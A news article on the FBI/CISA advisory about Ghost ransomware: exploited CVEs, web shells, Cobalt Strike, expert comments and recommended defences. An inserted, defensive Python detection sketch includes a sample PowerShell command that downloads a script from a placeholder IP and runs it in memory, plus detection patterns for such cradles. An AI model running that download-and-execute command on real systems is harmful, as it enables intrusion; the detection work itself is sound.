
FBI Urges Organizations to Back Up Data Immediately.
Latest Update, February 22, 2025: This article, first published on February 20, now offers additional technical insights into the Ghost ransomware operation, alongside expert insights from various cybersecurity professionals regarding the FBI’s security advisory.
Current cyber threats are dominated by phishing, social engineering, and scams, but these “click here” style campaigns are not the only threats that demand attention. Overlooking other attack strategies is like watching a thief walk off with your belongings because you were looking elsewhere.
Recently, the Federal Bureau of Investigation (FBI) published a crucial security advisory about a severe ransomware threat called Ghost, which is currently executing attacks across various industries in over 70 countries. Here’s what you must know and the essential steps the FBI recommends for immediate protection.
FBI Issues Urgent Advisory on Ghost Ransomware
On February 19, the FBI and the Cybersecurity and Infrastructure Security Agency released a joint security advisory (see AA25-050A) warning organizations globally about the Ghost ransomware group, which is actively targeting diverse sectors across numerous countries.
Operating primarily from China, these threat actors are known by various aliases, with Ghost being the most prevalent. Other names include Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. A notable aspect of their approach is their reliance on publicly available exploit code for unpatched software and firmware vulnerabilities: they use it to gain access to internet-facing servers and then deploy ransomware from that foothold.
According to the advisory, “The FBI has observed Ghost actors gaining entry to networks through vulnerabilities in publicly accessible applications closely associated with numerous Common Vulnerabilities and Exposures (CVEs).” Their approaches notably include exploiting weaknesses in Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint, and Microsoft Exchange, the latter via the vulnerabilities commonly referred to as the ProxyShell attack chain.
Several specific CVEs have been identified as being exploited during Ghost ransomware incidents, including:
- CVE-2009-3960
- CVE-2010-2861
- CVE-2018-13379
- CVE-2019-0604
- CVE-2021-31207
- CVE-2021-34473
- CVE-2021-34523
The year in each CVE identifier is the year the vulnerability was catalogued, and the oldest entries on this list date back to 2009 and 2010, underscoring the alarming reality that some systems have remained unpatched for over 15 years.
The advisory went on to describe how Ghost’s operators often upload a web shell to compromised servers. From there they use a mix of Windows command prompts and PowerShell to download and execute a Cobalt Strike Beacon on targeted systems. While the use of an established penetration-testing tool by criminals is not unusual, it remains notable that a tool designed for auditing security controls is being turned against the organizations it was meant to help.
According to the FBI, “Ghost actors frequently exploit built-in Cobalt Strike functions to steal process tokens operating under the SYSTEM user context to impersonate this user.” This is typically used to relaunch Beacon with elevated privileges. The hashdump function is then employed to collect credentials, including passwords, while another function lists running processes to identify the antivirus software that is active so it can be disabled. The advisory notes that Windows Defender in particular is “frequently disabled” on networked devices.
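As an added illustration (not part of the FBI advisory or this article), the following Python sketch shows how a defender might flag the chain just described in normalized Windows logs: a shell spawned by a web-server worker process (the web shell), a PowerShell download-and-execute command, and Defender’s real-time protection being turned off shortly afterward on the same host. The event IDs, process names and sample records are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample events (not from the advisory), as a SIEM might normalize
# Windows logs. Event IDs assumed: 4688 = process creation (Security log);
# 5001 = real-time protection disabled (Windows Defender/Operational log).
SAMPLE_EVENTS = [
    {"host": "web01", "ts": 100, "event_id": 4688, "parent": "w3wp.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a')"},
    {"host": "web01", "ts": 160, "event_id": 5001, "parent": "", "image": "", "cmdline": ""},
    {"host": "fs02", "ts": 200, "event_id": 4688, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},
    {"host": "fs02", "ts": 5000, "event_id": 5001, "parent": "", "image": "", "cmdline": ""},
]

# Web-server worker processes that should not normally spawn an interactive shell
# (IIS fronts ColdFusion, SharePoint and Exchange); the list is an assumption.
WEB_PARENTS = {"w3wp.exe", "httpd.exe", "coldfusion.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# "Download, then run in memory": a fetch primitive plus an execution primitive.
FETCH = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
EXEC_ = re.compile(r"\bIEX\b|Invoke-Expression", re.I)

def tag_event(ev):
    """Return the detection tags that a single event triggers."""
    tags = []
    if ev["event_id"] == 4688:
        if ev["parent"].lower() in WEB_PARENTS and ev["image"].lower() in SHELLS:
            tags.append("web_server_spawned_shell")
        if FETCH.search(ev["cmdline"]) and EXEC_.search(ev["cmdline"]):
            tags.append("powershell_download_cradle")
    elif ev["event_id"] == 5001:
        tags.append("defender_realtime_disabled")
    return tags

def detect(events, window=600):
    """Correlate per host: a shell/cradle event followed within `window` seconds
    by Defender being disabled is rated critical; either alone is rated medium."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for tag in tag_event(ev):
            per_host[ev["host"]].append((ev["ts"], tag))
    report = {}
    for host, hits in per_host.items():
        exec_ts = [ts for ts, t in hits if t != "defender_realtime_disabled"]
        av_ts = [ts for ts, t in hits if t == "defender_realtime_disabled"]
        chained = any(0 <= a - e <= window for e in exec_ts for a in av_ts)
        report[host] = {"tags": sorted({t for _, t in hits}),
                        "severity": "critical" if chained else "medium"}
    return report

if __name__ == "__main__":
    for host, finding in detect(SAMPLE_EVENTS).items():
        print(host, finding)
```

On the constructed input, web01 is rated critical because the web-shell-launched cradle is followed within the window by Defender going offline, while the isolated Defender event on fs02 stays a medium finding for an analyst to triage.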
Interestingly, while double-extortion tactics are prevalent, the FBI indicated that Ghost claims it will sell exfiltrated data unless a ransom is paid, although evidence suggests that significant amounts of sensitive data are rarely taken from the compromised entities, especially regarding “intellectual property or personally identifiable information that could severely harm victims if disclosed.”
Expert Insights on the FBI’s Ghost Warning
Juliette Hudson, CTO at CybaVerse, describes Ghost as a menacing nation-state threat that organizations must address. She emphasizes the pressing need for organizations to promptly patch and remediate vulnerabilities actively exploited by this group. In agreement, Darren Guccione, CEO of Keeper Security, warns that the Ghost ransomware initiative exemplifies how adversaries exploit known vulnerabilities faster than organizations can resolve them, reinforcing an urgent need for proactive risk management.
Joe Silva, CEO at Spektion, highlights that Ghost’s campaign underscores how attackers leverage patch fatigue among overwhelmed security teams. “This proves that traditional vulnerability management approaches are ineffective against the increasing number of exploits,” Silva asserts.
Rom Carmel, CEO at Apono, warns that cybercriminals continually find ways to infiltrate deeper into systems by compromising legitimate accounts. “To reduce the impact of account breaches, organizations must not only authenticate access but also enforce precise privilege controls tailored to limit access to critical resources,” Carmel advises.
Agnidipta Sarkar, VP CISO advisory at ColorTokens, characterizes Ghost’s attacks as a significant global threat. He emphasizes the necessity of understanding how the group identifies its victims. As Ghost targets unpatched vulnerabilities in tools like VPNs and firewalls, “They only require one successful breach to infiltrate victim networks,” Sarkar explains. Critically, many organizations, especially in critical infrastructure, neglect to address lateral movement after initial access.
Tim Mackey, head of software supply chain risk strategy at Black Duck, asserts that attacks on legacy cyber-physical and IoT devices are to be expected, necessitating solid operational plans for mitigating associated risks. “Even robustly secured devices from a decade ago can remain vulnerable today, especially to upcoming threats,” Mackey concludes. It’s essential that organizations collaborate with suppliers to formulate long-term operations and risk mitigation plans that prioritize timely vulnerability patching and threat intelligence sharing.
Four Immediate Actions Recommended by the FBI
The FBI urges all organizations to execute the following measures promptly to reduce the risks associated with the Ghost ransomware threat:
- Regularly back up systems, ensuring backups are stored separately, so they remain unaltered and unencrypted by potentially infected network devices.
- Swiftly patch known vulnerabilities by applying security updates to operating systems, software, and firmware in a timely, risk-informed manner.
- Segment networks to prevent lateral movement from initially infected devices to others within the organization.
- Enforce phishing-resistant multi-factor authentication for access to all privileged accounts and email service accounts.
In addition, ongoing phishing awareness training for users, applying the principle of least privilege in permission granting, and disabling unused ports are strongly recommended. The FBI also advises organizations to adopt allowlisting for applications, scripts, and network traffic to prevent unauthorized access and execution.
“Ghost is a significant threat from a nation-state actor, and organizations must take steps to safeguard against it,” cautioned Juliette Hudson, CTO at CybaVerse. “The group capitalizes on known CVEs in widely-used technologies, highlighting the urgent need for systematic patching and remediation strategies.”
Simon Phillips, CTO at SecureAck, added that the FBI and CISA advisories illustrate how the Ghost ransomware operation differs from typical ransomware attacks involving social engineering. “Given the business-oriented nature of the products targeted and the older CVEs being exploited, there’s an immediate need to strengthen basic security protocols,” he emphasized.
In conclusion, the FBI advises against paying ransoms, noting that such actions do not ensure victims will recover their files and may incentivize further cybercrime. As the advisory states, “Paying ransoms could encourage adversaries to target more organizations and motivate others to increase their ransomware distribution or fund illegal activities.”
